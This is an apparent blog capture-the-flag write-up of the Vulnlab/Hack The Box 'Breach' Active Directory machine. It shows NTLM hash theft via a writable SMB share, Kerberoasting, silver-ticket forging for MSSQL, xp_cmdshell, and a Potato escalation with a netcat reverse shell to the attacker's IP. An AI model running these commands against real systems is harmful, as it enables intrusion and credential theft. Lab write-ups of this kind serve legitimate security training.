Skip to main content
HashnodeMyHackMyHack

Command Palette

Search for a command to run...

Breach - Writeup (Vulnlab & HTB)

Anonymous SMB and NTLM theft enable Kerberoasting; forged silver tickets and MSSQL/token impersonation achieve SYSTEM.

Updated
5 min read
Breach - Writeup (Vulnlab & HTB)
S
shkz

INFO | Ports & Services

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-13 03:38:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   10.129.161.73:1433:
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
| ms-sql-info:
|   10.129.161.73:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-13T03:32:19
| Not valid after:  2055-10-13T03:32:19
| MD5:     71a0 a7d1 0415 5273 c435 a1b7 3f3c a693
| SHA-1:   33ec 70c4 bb5c f6f9 70f0 a974 0d5e 8f58 61d8 0b19
|_SHA-256: bd49 856e b83c ee10 e888 7f2e 25f5 8c3c 1080 205c 4c16 2a57 af4b 3e37 2d87 8c2f
|_ssl-date: 2025-10-13T03:39:41+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-07T08:04:48
| Not valid after:  2026-03-09T08:04:48
| MD5:     f457 54f6 0073 10ba ecb2 0f99 fca9 d035
| SHA-1:   ccc9 9cbf 5171 71cb 42e1 4951 243c e58c a229 cd36
|_SHA-256: 27dd 4b87 17d3 579e baa5 97f7 b638 7b2b ba05 ad39 fd81 d60f 4108 3a48 3602 55f8
|_ssl-date: 2025-10-13T03:39:41+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-13T03:39:01+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

FOOTHOLD

The initial nmap scan indicates that we are dealing with a Windows AD environment. I performed a bruteforce attack on user RIDs using netexec to enumerate users.

nxc smb BREACHDC.breach.vl -u 'aasdad' -p '' --rid-brute

Domain Users

Christine.Bruce
Claire.Pope
Diana.Pope
George.Williams
Hilary.Reed
Hugh.Watts
Jasmine.Price
Jasmine.Slater
Julia.Wong
Lawrence.Kaur
staff
svc_mssql

SMB Guest Allowed

If we connect as Guest via SMB and enumerate shares, we get the following resources:

We have a folder with read and write permissions, which is interesting.

smbclient //10.129.161.73/share --no-pass

Since there is nothing useful inside, we can use these folders to upload our own files to steal NTLM hashes

The first step is to generate multiple files using ntlm_theft.py.

python3 ntlm_theft.py -g all -s 10.10.14.42 --filename testingFiles

Then I run responder:

responder -I tun0 -Pv

Finally, I upload all the files:

prompt off
mput *

After a while, I receive hashes from Julia.Wong:

We cracked it with Hashcat and obtained the password:

JULIA.WONG --> Computer1

SMB | User.txt

Im now checking with the valid credentials of Julia.Wong, and in the shared resource share, we obtained the flag for user.txt.

Bloodhound

Like in any environment, I like to know where I stand and what permissions I have, so I grab all the objects from Active Directory and run them through Bloodhound for analysis.


nxc ldap 10.129.161.73 -u 'JULIA.WONG' -p 'Computer1' --bloodhound -c all --dns-server 10.129.161.73

Kerberoast | SVC_MSSQL

By analyzing bloodhound, we can discover that the account SVC_MSSQL appears to be kerberoastable.

We carried out the kerberoast attack:

targetedKerberoast.py -v --dc-ip 10.129.161.73 -d breach.vl -u JULIA.WONG -p 'Computer1'

Finally we cracked it with hashcat:

svc_mssql -> Trustno1

MSSQLSvc

Having valid credentials, we can connect to the SQL service that we observed during the initial scan with nmap:

mssqlclient.py 10.129.161.73/svc_mssql:'Trustno1'@10.129.161.73 -windows-auth

Even though we've compromised the account, we realize we don't have enough permissions to run commands. We can list stuff with xp_dirtree, but we need command execution to make an real impact:

[%] exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.

Silver Ticket Abuse

We can abuse silver tickets to escalate privileges. First, we obtain the Domain SID:

lookupsid.py 'breach.vl/svc_mssql@10.129.161.73'

S-1-5-21-2330692793-3312915120-706255856

Next, we generate the NTHASH of the password of the service account that we control:

iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4

MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c

Finally, we generated the silver ticket:

ticketer.py -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -dc-ip 10.10.77.106 -spn mssql/breachdc.breach.vl -domain breach.vl Administrator

We export the ticket and reconnect to the MSSQL service:

mssqlclient.py -k BREACHDC.breach.vl

We will see that this time we are Administrator:

We enable xp_cmdshell and then we can run any command on the system, we will get a revshell, in my case an encoded powershell:

PrivEsc to Administrator

Once inside the system, escalation is very easy.. we take advantage of the following privilege with any Potato of preference:

.\god.exe -cmd "nc.exe -e powershell.exe 10.10.14.42 8000"

Finally, we got the root.txt and pwned!

#ctf-writeup#hackthebox#vulnlab

More from this blog

M

MyHack

40 posts

MyHack.tech is a personal blog focused on Hacking, Linux, CTF challenges and practical Offensive Security..